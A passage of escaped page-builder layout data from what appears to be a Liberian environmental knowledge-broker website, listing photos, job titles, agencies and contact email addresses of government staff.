ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/Halala.jpg\",\"id\":5086,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/ernest.jpg\",\"id\":5087,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dd05ae4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/wonpue.jpg\",\"id\":5091,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a 